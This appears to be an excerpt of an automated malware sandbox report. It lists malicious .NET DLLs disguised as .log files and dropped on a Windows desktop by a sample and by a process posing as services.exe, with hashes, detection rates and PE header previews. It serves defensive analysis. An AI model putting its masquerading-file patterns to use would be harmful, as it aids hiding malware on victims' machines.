                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\dBbaXxPL.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):39936
                                                              Entropy (8bit):5.629584586954759
                                                              Encrypted:false
                                                              SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                              MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                              SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                              SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                              SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\dxMPeMlr.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):39936
                                                              Entropy (8bit):5.660491370279985
                                                              Encrypted:false
                                                              SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                              MD5:240E98D38E0B679F055470167D247022
                                                              SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                              SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                              SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\fHiQeeRs.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):41472
                                                              Entropy (8bit):5.6808219961645605
                                                              Encrypted:false
                                                              SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                              MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                              SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                              SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                              SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\guqIJuAJ.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):50176
                                                              Entropy (8bit):5.723168999026349
                                                              Encrypted:false
                                                              SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                              MD5:2E116FC64103D0F0CF47890FD571561E
                                                              SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                              SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                              SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\hnCGlIml.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):64000
                                                              Entropy (8bit):5.857602289000348
                                                              Encrypted:false
                                                              SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                              MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                              SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                              SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                              SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 25%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\hrRQfuPE.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):342528
                                                              Entropy (8bit):6.170134230759619
                                                              Encrypted:false
                                                              SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                              MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                              SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                              SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                              SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\iSjOnjPm.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):126976
                                                              Entropy (8bit):6.057993947082715
                                                              Encrypted:false
                                                              SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                              MD5:16B480082780CC1D8C23FB05468F64E7
                                                              SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                              SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                              SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                              C:\Users\user\Desktop\iosYAuez.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):24576
                                                              Entropy (8bit):5.535426842040921
                                                              Encrypted:false
                                                              SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                              MD5:5420053AF2D273C456FB46C2CDD68F64
                                                              SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                              SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                              SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\jkgzQrBD.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):38912
                                                              Entropy (8bit):5.679286635687991
                                                              Encrypted:false
                                                              SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                              MD5:9E910782CA3E88B3F87826609A21A54E
                                                              SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                              SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                              SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\kdtxsFme.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):34304
                                                              Entropy (8bit):5.618776214605176
                                                              Encrypted:false
                                                              SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                              MD5:9B25959D6CD6097C0EF36D2496876249
                                                              SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                              SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                              SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 9%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\kuAPHbgg.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):39936
                                                              Entropy (8bit):5.629584586954759
                                                              Encrypted:false
                                                              SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                              MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                              SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                              SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                              SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\lQBpXVWv.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):89600
                                                              Entropy (8bit):5.905167202474779
                                                              Encrypted:false
                                                              SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                              MD5:06442F43E1001D860C8A19A752F19085
                                                              SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                              SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                              SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 16%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

                                                              C:\Users\user\Desktop\naXqXoBw.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):32256
                                                              Entropy (8bit):5.631194486392901
                                                              Encrypted:false
                                                              SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                              MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                              SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                              SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                              SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 25%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\oXyytoQr.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):28160
                                                              Entropy (8bit):5.570953308352568
                                                              Encrypted:false
                                                              SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                              MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                              SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                              SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                              SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\olqGOXgZ.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):24064
                                                              Entropy (8bit):5.492504448438552
                                                              Encrypted:false
                                                              SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                              MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                              SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                              SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                              SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 33%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\piSOkXvU.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):294912
                                                              Entropy (8bit):6.010605469502259
                                                              Encrypted:false
                                                              SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                              MD5:00574FB20124EAFD40DC945EC86CA59C
                                                              SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                              SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                              SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                              C:\Users\user\Desktop\qWWWVlrS.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):36352
                                                              Entropy (8bit):5.668291349855899
                                                              Encrypted:false
                                                              SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                              MD5:94DA5073CCC14DCF4766DF6781485937
                                                              SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                              SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                              SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\qeFoAUSY.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):89600
                                                              Entropy (8bit):5.905167202474779
                                                              Encrypted:false
                                                              SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                              MD5:06442F43E1001D860C8A19A752F19085
                                                              SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                              SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                              SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 16%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

                                                              C:\Users\user\Desktop\rbhxVUhT.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):22016
                                                              Entropy (8bit):5.41854385721431
                                                              Encrypted:false
                                                              SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                              MD5:BBDE7073BAAC996447F749992D65FFBA
                                                              SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                              SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                              SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\sGFWWBqe.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):46592
                                                              Entropy (8bit):5.870612048031897
                                                              Encrypted:false
                                                              SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                              MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                              SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                              SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                              SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\uMMNchrL.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):38400
